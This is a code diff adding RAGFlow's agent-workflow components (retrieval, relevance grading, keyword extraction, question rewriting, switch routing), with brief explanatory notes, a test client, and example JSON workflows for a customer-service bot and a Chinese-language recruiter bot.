                                                       LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING,
                                                                 self._canvas.get_embedding_model()),
                                                       tkweight=0.7,
                                                       vtweight=0.3)
            doc_ids = set([])
            recall_docs = []
            for i in idx:
                did = retrieval_res.loc[int(i), "doc_id"]
                if did in doc_ids:
                    continue
                doc_ids.add(did)
                recall_docs.append({"doc_id": did, "doc_name": retrieval_res.loc[int(i), "docnm_kwd"]})

            del retrieval_res["vector"]
            del retrieval_res["content_ltks"]

            reference = {
                "chunks": [ck.to_dict() for _, ck in retrieval_res.iterrows()],
                "doc_aggs": recall_docs
            }

            if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
                answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
            res = {"content": answer, "reference": reference}
            yield res

        self.set_output(res)
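The prompt template mechanism is plain string substitution: every kwarg (including the upstream "input") replaces a {name} placeholder via re.sub. A minimal standalone sketch of that step, with illustrative values:

    import re

    prompt = "Answer using the knowledge below:\n{input}\nTone: {tone}"
    kwargs = {"input": "- RAGFlow is a RAG engine.", "tone": "concise"}
    for n, v in kwargs.items():
        prompt = re.sub(r"\{%s\}" % n, str(v), prompt)
    # prompt now reads:
    # Answer using the knowledge below:
    # - RAGFlow is a RAG engine.
    # Tone: concise

Note the commented-out re.escape variant in _run above: escaping the replacement would protect against backslashes in substituted values, at the cost of mangling ordinary text, which is presumably why it was left disabled.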
graph/component/keyword.py (Normal file, +65 lines)
@@ -0,0 +1,65 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import re
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from graph.component import GenerateParam, Generate
from graph.settings import DEBUG


class KeywordExtractParam(GenerateParam):
    """
    Define the KeywordExtract component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 1

    def check(self):
        super().check()
        self.check_positive_integer(self.top_n, "Top N")

    def get_prompt(self):
        self.prompt = """
        - Role: You're a question analyzer.
        - Requirements:
          - Summarize the user's question and give the top %s most important keywords/phrases.
          - Use a comma as the delimiter between keywords/phrases.
        - Answer format: (in the language of the user's question)
          - keyword:
        """ % self.top_n
        return self.prompt


class KeywordExtract(Generate, ABC):
    component_name = "KeywordExtract"

    def _run(self, history, **kwargs):
        q = ""
        for r, c in self._canvas.history[::-1]:
            if r == "user":
                q += c
                break

        chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
        ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": q}],
                            self._param.gen_conf())

        ans = re.sub(r".*keyword:", "", ans).strip()
        if DEBUG:
            print(ans, ":::::::::::::::::::::::::::::::::")
        return KeywordExtract.be_output(ans)
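The post-processing relies on the model echoing the "keyword:" label from the answer format; the greedy re.sub strips everything up to and including the last such label. A worked example of that call:

    import re

    ans = "- keyword: vector search, embeddings, reranking"
    ans = re.sub(r".*keyword:", "", ans).strip()
    # ans == "vector search, embeddings, reranking"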
graph/component/message.py (Normal file, +52 lines)
@@ -0,0 +1,52 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import random
from abc import ABC
from functools import partial

from graph.component.base import ComponentBase, ComponentParamBase


class MessageParam(ComponentParamBase):
    """
    Define the Message component parameters.
    """
    def __init__(self):
        super().__init__()
        self.messages = []

    def check(self):
        self.check_empty(self.messages, "[Message]")
        return True


class Message(ComponentBase, ABC):
    component_name = "Message"

    def _run(self, history, **kwargs):
        if kwargs.get("stream"):
            return partial(self.stream_output)

        return Message.be_output(random.choice(self._param.messages))

    def stream_output(self):
        if self._param.messages:
            yield {"content": random.choice(self._param.messages)}
graph/component/relevant.py (Normal file, +80 lines)
@@ -0,0 +1,80 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from graph.component import GenerateParam, Generate
from rag.utils import num_tokens_from_string, encoder


class RelevantParam(GenerateParam):
    """
    Define the Relevant component parameters.
    """
    def __init__(self):
        super().__init__()
        self.prompt = ""
        self.yes = ""
        self.no = ""

    def check(self):
        super().check()
        self.check_empty(self.yes, "[Relevant] 'Yes'")
        self.check_empty(self.no, "[Relevant] 'No'")

    def get_prompt(self):
        self.prompt = """
        You are a grader assessing the relevance of a retrieved document to a user question.
        It does not need to be a stringent test. The goal is to filter out erroneous retrievals.
        If the document contains keyword(s) or semantic meaning related to the user question, grade it as relevant.
        Give a binary score, 'yes' or 'no', to indicate whether the document is relevant to the question.
        No other words are needed except 'yes' or 'no'.
        """
        return self.prompt


class Relevant(Generate, ABC):
    component_name = "Relevant"

    def _run(self, history, **kwargs):
        q = ""
        for r, c in self._canvas.history[::-1]:
            if r == "user":
                q = c
                break
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return Relevant.be_output(self._param.no)
        ans = "Documents: \n" + ans
        ans = f"Question: {q}\n" + ans
        chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)

        if num_tokens_from_string(ans) >= chat_mdl.max_length - 4:
            ans = encoder.decode(encoder.encode(ans)[:chat_mdl.max_length - 4])

        ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": ans}],
                            self._param.gen_conf())

        print(ans, ":::::::::::::::::::::::::::::::::")
        if ans.lower().find("yes") >= 0:
            return Relevant.be_output(self._param.yes)
        if ans.lower().find("no") >= 0:
            return Relevant.be_output(self._param.no)
        assert False, f"Relevant component got: {ans}"
graph/component/retrieval.py (Normal file, +88 lines)
@@ -0,0 +1,88 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
from abc import ABC

import pandas as pd

from api.db import LLMType
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMBundle
from api.settings import retrievaler
from graph.component.base import ComponentBase, ComponentParamBase


class RetrievalParam(ComponentParamBase):
    """
    Define the Retrieval component parameters.
    """
    def __init__(self):
        super().__init__()
        self.similarity_threshold = 0.2
        self.keywords_similarity_weight = 0.5
        self.top_n = 8
        self.top_k = 1024
        self.kb_ids = []
        self.rerank_id = ""
        self.empty_response = ""

    def check(self):
        self.check_decimal_float(self.similarity_threshold, "[Retrieval] Similarity threshold")
        self.check_decimal_float(self.keywords_similarity_weight, "[Retrieval] Keywords similarity weight")
        self.check_positive_number(self.top_n, "[Retrieval] Top N")
        self.check_empty(self.kb_ids, "[Retrieval] Knowledge bases")


class Retrieval(ComponentBase, ABC):
    component_name = "Retrieval"

    def _run(self, history, **kwargs):
        query = []
        for role, cnt in history[::-1][:self._param.message_history_window_size]:
            if role != "user":
                continue
            query.append(cnt)
        query = "\n".join(query)

        kbs = KnowledgebaseService.get_by_ids(self._param.kb_ids)
        if not kbs:
            raise ValueError("Can't find knowledgebases by {}".format(self._param.kb_ids))
        embd_nms = list(set([kb.embd_id for kb in kbs]))
        assert len(embd_nms) == 1, "Knowledge bases use different embedding models."

        embd_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING, embd_nms[0])
        self._canvas.set_embedding_model(embd_nms[0])

        rerank_mdl = None
        if self._param.rerank_id:
            rerank_mdl = LLMBundle(kbs[0].tenant_id, LLMType.RERANK, self._param.rerank_id)

        kbinfos = retrievaler.retrieval(query, embd_mdl, kbs[0].tenant_id, self._param.kb_ids,
                                        1, self._param.top_n,
                                        self._param.similarity_threshold, 1 - self._param.keywords_similarity_weight,
                                        aggs=False, rerank_mdl=rerank_mdl)

        if not kbinfos["chunks"]:
            df = Retrieval.be_output(self._param.empty_response)
            df["empty_response"] = True
            return df

        df = pd.DataFrame(kbinfos["chunks"])
        df["content"] = df["content_with_weight"]
        del df["content_with_weight"]
        print(">>>>>>>>>>>>>>>>>>>>>>>>>>\n", query, df)
        return df
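When retrieval finds no chunks, the component doesn't raise; it emits the configured empty_response wrapped in a one-row DataFrame and marks it with an empty_response column, which Generate._run checks before calling the LLM. A sketch of that round trip, assuming only pandas:

    import pandas as pd

    df = pd.DataFrame([{"content": "Sorry, nothing relevant was found."}])
    df["empty_response"] = True

    # Downstream, Generate short-circuits on the marker column:
    if "empty_response" in df.columns:
        reply = "\n- ".join(df["content"])   # echoed back instead of an LLM call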
graph/component/rewrite.py (Normal file, +72 lines)
@@ -0,0 +1,72 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from graph.component import GenerateParam, Generate


class RewriteQuestionParam(GenerateParam):
    """
    Define the RewriteQuestion component parameters.
    """
    def __init__(self):
        super().__init__()
        self.temperature = 0.9
        self.prompt = ""
        self.loop = 1

    def check(self):
        super().check()

    def get_prompt(self):
        self.prompt = """
        You are an expert at query expansion, generating paraphrasings of a question.
        I can't retrieve relevant information from the knowledge base by using the user's question directly.
        You need to expand or paraphrase the user's question in multiple ways, such as using synonymous words/phrases,
        writing the abbreviation out in its entirety, adding some extra descriptions or explanations,
        changing the way of expression, translating the original question into another language (English/Chinese), etc.
        Return 5 versions of the question, one of which is a translation.
        Just list the questions. No other words are needed.
        """
        return self.prompt


class RewriteQuestion(Generate, ABC):
    component_name = "RewriteQuestion"

    def _run(self, history, **kwargs):
        if not hasattr(self, "_loop"):
            setattr(self, "_loop", 0)
        if self._loop >= self._param.loop:
            self._loop = 0
            raise Exception("Maximum loop count exceeded. Can't find relevant information.")
        self._loop += 1
        q = "Question: "
        for r, c in self._canvas.history[::-1]:
            if r == "user":
                q += c
                break

        chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
        ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": q}],
                            self._param.gen_conf())

        print(ans, ":::::::::::::::::::::::::::::::::")
        return RewriteQuestion.be_output(ans)
graph/component/switch.py (Normal file, +82 lines)
@@ -0,0 +1,82 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
from abc import ABC

import pandas as pd

from graph.component.base import ComponentBase, ComponentParamBase


class SwitchParam(ComponentParamBase):
    """
    Define the Switch component parameters.
    """
    def __init__(self):
        super().__init__()
        """
        Each condition has the shape:
        {
            "cpn_id": "categorize:0",
            "not": False,
            "operator": "gt/gte/lt/lte/eq/in",
            "value": "",
            "to": ""
        }
        """
        self.conditions = []
        self.default = ""

    def check(self):
        self.check_empty(self.conditions, "[Switch] conditions")
        self.check_empty(self.default, "[Switch] Default path")
        for cond in self.conditions:
            if not cond["to"]:
                raise ValueError("[Switch] 'To' can not be empty!")

    def operators(self, field, op, value):
        if op == "gt":
            return float(field) > float(value)
        if op == "gte":
            return float(field) >= float(value)
        if op == "lt":
            return float(field) < float(value)
        if op == "lte":
            return float(field) <= float(value)
        if op == "eq":
            return str(field) == str(value)
        if op == "in":
            return str(field).find(str(value)) >= 0
        return False


class Switch(ComponentBase, ABC):
    component_name = "Switch"

    def _run(self, history, **kwargs):
        for cond in self._param.conditions:
            input = self._canvas.get_component(cond["cpn_id"])["obj"].output()[1]
            res = self._param.operators(input.iloc[0, 0], cond["operator"], cond["value"])
            # The "not" flag documented above inverts the condition's result.
            if res != bool(cond.get("not", False)):
                return pd.DataFrame([{"content": cond["to"]}])

        return pd.DataFrame([{"content": self._param.default}])
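Each condition compares the first cell of the referenced component's output DataFrame against a literal value. A small sketch of how one condition dict evaluates, using the param class directly with illustrative values:

    param = SwitchParam()
    cond = {"cpn_id": "categorize:0", "not": False,
            "operator": "eq", "value": "product_related", "to": "retrieval:0"}

    field = "product_related"            # stands in for input.iloc[0, 0]
    matched = param.operators(field, cond["operator"], cond["value"])
    if matched != bool(cond.get("not", False)):
        route = cond["to"]               # -> "retrieval:0"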
graph/settings.py (Normal file, +34 lines)
@@ -0,0 +1,34 @@
#
#  Copyright 2019 The FATE Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
# Logger
import os

from api.utils.file_utils import get_project_base_directory
from api.utils.log_utils import LoggerFactory, getLogger

DEBUG = 0
LoggerFactory.set_directory(
    os.path.join(
        get_project_base_directory(),
        "logs",
        "flow"))
# {CRITICAL: 50, FATAL:50, ERROR:40, WARNING:30, WARN:30, INFO:20, DEBUG:10, NOTSET:0}
LoggerFactory.LEVEL = 30

flow_logger = getLogger("flow")
database_logger = getLogger("database")
FLOAT_ZERO = 1e-8
PARAM_MAXDEPTH = 5
graph/templates/HR_callout_zh.json (Normal file, +725 lines)
File diff suppressed because one or more lines are too long
graph/templates/customer_service.json (Normal file, +620 lines)
File diff suppressed because one or more lines are too long
graph/templates/general_chat_bot.json (Normal file, +335 lines)
File diff suppressed because one or more lines are too long
graph/templates/interpreter.json (Normal file, +158 lines)
File diff suppressed because one or more lines are too long
graph/test/client.py (Normal file, +49 lines)
@@ -0,0 +1,49 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import argparse
import os
from functools import partial
import readline  # noqa: F401 -- enables line editing for input()

from graph.canvas import Canvas
from graph.settings import DEBUG

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    dsl_default_path = os.path.join(
        os.path.dirname(os.path.realpath(__file__)),
        "dsl_examples",
        "retrieval_and_generate.json",
    )
    parser.add_argument('-s', '--dsl', default=dsl_default_path, help="input dsl", action='store', required=False)
    parser.add_argument('-t', '--tenant_id', help="Tenant ID", action='store', required=True)
    parser.add_argument('-m', '--stream', default=False, help="Stream output", action='store_true', required=False)
    args = parser.parse_args()

    canvas = Canvas(open(args.dsl, "r").read(), args.tenant_id)
    while True:
        ans = canvas.run(stream=args.stream)
        print("==================== Bot =====================\n> ", end='')
        if args.stream and isinstance(ans, partial):
            cont = ""
            for an in ans():
                print(an["content"][len(cont):], end='', flush=True)
                cont = an["content"]
        else:
            print(ans["content"])

        if DEBUG:
            print(canvas.path)
        question = input("\n==================== User =====================\n> ")
        canvas.add_user_input(question)
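With the defaults above, an interactive session might be launched from the repository root along these lines (the tenant ID is a placeholder; exact invocation depends on how the package is on the Python path):

    python graph/test/client.py -s graph/test/dsl_examples/retrieval_and_generate.json -t <tenant_id> -m

The -m flag switches the canvas into streaming mode, in which run() returns a partial that the loop above drains chunk by chunk.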
graph/test/dsl_examples/categorize.json (Normal file, +45 lines)
@@ -0,0 +1,45 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there!"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["categorize:0"],
            "upstream": ["begin"]
        },
        "categorize:0": {
            "obj": {
                "component_name": "Categorize",
                "params": {
                    "llm_id": "deepseek-chat",
                    "category_description": {
                        "product_related": {
                            "description": "The question is about the product usage, appearance and how it works.",
                            "examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?"
                        },
                        "others": {
                            "description": "The question is not about the product usage, appearance and how it works.",
                            "examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?"
                        }
                    }
                }
            },
            "downstream": [],
            "upstream": ["answer:0"]
        }
    },
    "history": [],
    "path": [],
    "answer": []
}
graph/test/dsl_examples/customer_service.json (Normal file, +157 lines)
@@ -0,0 +1,157 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi! How can I help you?"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["categorize:0"],
            "upstream": ["begin", "generate:0", "generate:casual", "generate:answer", "generate:complain", "generate:ask_contact", "message:get_contact"]
        },
        "categorize:0": {
            "obj": {
                "component_name": "Categorize",
                "params": {
                    "llm_id": "deepseek-chat",
                    "category_description": {
                        "product_related": {
                            "description": "The question is about the product usage, appearance and how it works.",
                            "examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?\nException: Can't connect to ES cluster\nHow to build the RAGFlow image from scratch",
                            "to": "retrieval:0"
                        },
                        "casual": {
                            "description": "The question is not about the product usage, appearance and how it works. Just casual chat.",
                            "examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
                            "to": "generate:casual"
                        },
                        "complain": {
                            "description": "Complaints or even curses about the product or service you provide, but the comment is not specific enough.",
                            "examples": "How bad is it.\nIt's really sucks.\nDamn, for God's sake, can it be more steady?\nShit, I just can't use this shit.\nI can't stand it anymore.",
                            "to": "generate:complain"
                        },
                        "answer": {
                            "description": "This answer provides specific contact information, like e-mail, phone number, WeChat number, LINE number, Twitter, Discord, etc.",
                            "examples": "My phone number is 203921\nkevinhu.hk@gmail.com\nThis is my discord number: johndowson_29384",
                            "to": "message:get_contact"
                        }
                    },
                    "message_history_window_size": 8
                }
            },
            "downstream": ["retrieval:0", "generate:casual", "generate:complain", "message:get_contact"],
            "upstream": ["answer:0"]
        },
        "generate:casual": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are a customer support agent, but the customer wants to have a casual chat with you instead of consulting about the product. Be nice, funny, enthusiastic and caring.",
                    "temperature": 0.9,
                    "message_history_window_size": 12,
                    "cite": false
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["categorize:0"]
        },
        "generate:complain": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are a customer support agent. The customer complains or even curses about the product but is not specific enough. You need to ask him/her what the specific problem with the product is. Be nice, patient and caring to soothe your customer's emotions in the first place.",
                    "temperature": 0.9,
                    "message_history_window_size": 12,
                    "cite": false
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["categorize:0"]
        },
        "retrieval:0": {
            "obj": {
                "component_name": "Retrieval",
                "params": {
                    "similarity_threshold": 0.2,
                    "keywords_similarity_weight": 0.3,
                    "top_n": 6,
                    "top_k": 1024,
                    "rerank_id": "BAAI/bge-reranker-v2-m3",
                    "kb_ids": ["869a236818b811ef91dffa163e197198"]
                }
            },
            "downstream": ["relevant:0"],
            "upstream": ["categorize:0"]
        },
        "relevant:0": {
            "obj": {
                "component_name": "Relevant",
                "params": {
                    "llm_id": "deepseek-chat",
                    "temperature": 0.02,
                    "yes": "generate:answer",
                    "no": "generate:ask_contact"
                }
            },
            "downstream": ["generate:answer", "generate:ask_contact"],
            "upstream": ["retrieval:0"]
        },
        "generate:answer": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n      Knowledge base content is as following:\n      {input}\n      The above is the content of knowledge base.",
                    "temperature": 0.02
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["relevant:0"]
        },
        "generate:ask_contact": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are a customer support agent, but you can't answer the customer's question. You need to request their contact information, like e-mail, phone number, WeChat number, LINE number, Twitter, Discord, etc. Product experts will contact them later. Please do not ask the same question twice.",
                    "temperature": 0.9,
                    "message_history_window_size": 12,
                    "cite": false
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["relevant:0"]
        },
        "message:get_contact": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "messages": [
                        "Okay, I've written this down. What else can I do for you?",
                        "Got it. What else can I do for you?",
                        "Thanks for your trust! Our expert will contact you ASAP. So, anything else I can do for you?",
                        "Thanks! So, anything else I can do for you?"
                    ]
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["categorize:0"]
        }
    },
    "history": [],
    "messages": [],
    "path": [],
    "reference": [],
    "answer": []
}
graph/test/dsl_examples/headhunter_zh.json (Normal file, +210 lines)
@@ -0,0 +1,210 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "您好!我是AGI方向的猎头,了解到您是这方面的大佬,然后冒昧的就联系到您。这边有个机会想和您分享,RAGFlow正在招聘您这个岗位的资深的工程师不知道您那边是不是感兴趣?"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["categorize:0"],
            "upstream": ["begin", "message:reject"]
        },
        "categorize:0": {
            "obj": {
                "component_name": "Categorize",
                "params": {
                    "llm_id": "deepseek-chat",
                    "category_description": {
                        "about_job": {
                            "description": "该问题关于职位本身或公司的信息。",
                            "examples": "什么岗位?\n汇报对象是谁?\n公司多少人?\n公司有啥产品?\n具体工作内容是啥?\n地点哪里?\n双休吗?",
                            "to": "retrieval:0"
                        },
                        "casual": {
                            "description": "该问题不关于职位本身或公司的信息,属于闲聊。",
                            "examples": "你好\n好久不见\n你男的女的?\n你是猴子派来的救兵吗?\n上午开会了?\n你叫啥?\n最近市场如何?生意好做吗?",
                            "to": "generate:casual"
                        },
                        "interested": {
                            "description": "该回答表示他对于该职位感兴趣。",
                            "examples": "嗯\n说吧\n说说看\n还好吧\n是的\n哦\nyes\n具体说说",
                            "to": "message:introduction"
                        },
                        "answer": {
                            "description": "该回答表示他对于该职位不感兴趣,或感觉受到骚扰。",
                            "examples": "不需要\n不感兴趣\n暂时不看\n不要\nno\n我已经不干这个了\n我不是这个方向的",
                            "to": "message:reject"
                        }
                    }
                }
            },
            "downstream": [
                "message:introduction",
                "generate:casual",
                "message:reject",
                "retrieval:0"
            ],
            "upstream": ["answer:0"]
        },
        "message:introduction": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "messages": [
                        "我简单介绍以下:\nRAGFlow 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。https://github.com/infiniflow/ragflow\n您那边还有什么要了解的?"
                    ]
                }
            },
            "downstream": ["answer:1"],
            "upstream": ["categorize:0"]
        },
        "answer:1": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["categorize:1"],
            "upstream": [
                "message:introduction",
                "generate:aboutJob",
                "generate:casual",
                "generate:get_wechat",
                "generate:nowechat"
            ]
        },
        "categorize:1": {
            "obj": {
                "component_name": "Categorize",
                "params": {
                    "llm_id": "deepseek-chat",
                    "category_description": {
                        "about_job": {
                            "description": "该问题关于职位本身或公司的信息。",
                            "examples": "什么岗位?\n汇报对象是谁?\n公司多少人?\n公司有啥产品?\n具体工作内容是啥?\n地点哪里?\n双休吗?",
                            "to": "retrieval:0"
                        },
                        "casual": {
                            "description": "该问题不关于职位本身或公司的信息,属于闲聊。",
                            "examples": "你好\n好久不见\n你男的女的?\n你是猴子派来的救兵吗?\n上午开会了?\n你叫啥?\n最近市场如何?生意好做吗?",
                            "to": "generate:casual"
                        },
                        "wechat": {
                            "description": "该回答表示他愿意加微信,或者已经报了微信号。",
                            "examples": "嗯\n可以\n是的\n哦\nyes\n15002333453\nwindblow_2231",
                            "to": "generate:get_wechat"
                        },
                        "giveup": {
                            "description": "该回答表示他不愿意加微信。",
                            "examples": "不需要\n不感兴趣\n暂时不看\n不要\nno\n不方便\n不知道还要加我微信",
                            "to": "generate:nowechat"
                        }
                    },
                    "message_history_window_size": 8
                }
            },
            "downstream": [
                "retrieval:0",
                "generate:casual",
                "generate:get_wechat",
                "generate:nowechat"
            ],
            "upstream": ["answer:1"]
        },
        "generate:casual": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "你是AGI方向的猎头,现在候选人的聊了和职位无关的话题,请耐心的回应候选人,并将话题往该AGI的职位上带,最好能要到候选人微信号以便后面保持联系。",
                    "temperature": 0.9,
                    "message_history_window_size": 12,
                    "cite": false
                }
            },
            "downstream": ["answer:1"],
            "upstream": ["categorize:0", "categorize:1"]
        },
        "retrieval:0": {
            "obj": {
                "component_name": "Retrieval",
                "params": {
                    "similarity_threshold": 0.2,
                    "keywords_similarity_weight": 0.3,
                    "top_n": 6,
                    "top_k": 1024,
                    "rerank_id": "BAAI/bge-reranker-v2-m3",
                    "kb_ids": ["869a236818b811ef91dffa163e197198"]
                }
            },
            "downstream": ["generate:aboutJob"],
            "upstream": ["categorize:0", "categorize:1"]
        },
        "generate:aboutJob": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "你是AGI方向的猎头,候选人问了有关职位或公司的问题,你根据以下职位信息回答。如果职位信息中不包含候选人的问题就回答不清楚、不知道、有待确认等。回答完后引导候选人加微信号,如:\n - 方便加一下微信吗,我把JD发您看看?\n - 微信号多少,我把详细职位JD发您?\n 职位信息如下:\n {input}\n 职位信息如上。",
                    "temperature": 0.02
                }
            },
            "downstream": ["answer:1"],
            "upstream": ["retrieval:0"]
        },
        "generate:get_wechat": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "你是AGI方向的猎头,候选人表示不反感加微信,如果对方已经报了微信号,表示感谢和信任并表示马上会加上;如果没有,则问对方微信号多少。你的微信号是weixin_kevin,E-mail是kkk@ragflow.com。说话不要重复。不要总是您好。",
                    "temperature": 0.1,
                    "message_history_window_size": 12,
                    "cite": false
                }
            },
            "downstream": ["answer:1"],
            "upstream": ["categorize:1"]
        },
        "generate:nowechat": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "你是AGI方向的猎头,当你提出加微信时对方表示拒绝。你需要耐心礼貌的回应候选人,表示对于保护隐私信息给予理解,也可以询问他对该职位的看法和顾虑。并在恰当的时机再次询问微信联系方式。也可以鼓励候选人主动与你取得联系。你的微信号是weixin_kevin,E-mail是kkk@ragflow.com。说话不要重复。不要总是您好。",
                    "temperature": 0.1,
                    "message_history_window_size": 12,
                    "cite": false
                }
            },
            "downstream": ["answer:1"],
            "upstream": ["categorize:1"]
        },
        "message:reject": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "messages": [
                        "好的,祝您生活愉快,工作顺利。",
                        "哦,好的,感谢您宝贵的时间!"
                    ]
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["categorize:0"]
        }
    },
    "history": [],
    "messages": [],
    "path": [],
    "reference": [],
    "answer": []
}
graph/test/dsl_examples/intergreper.json (Normal file, +39 lines)
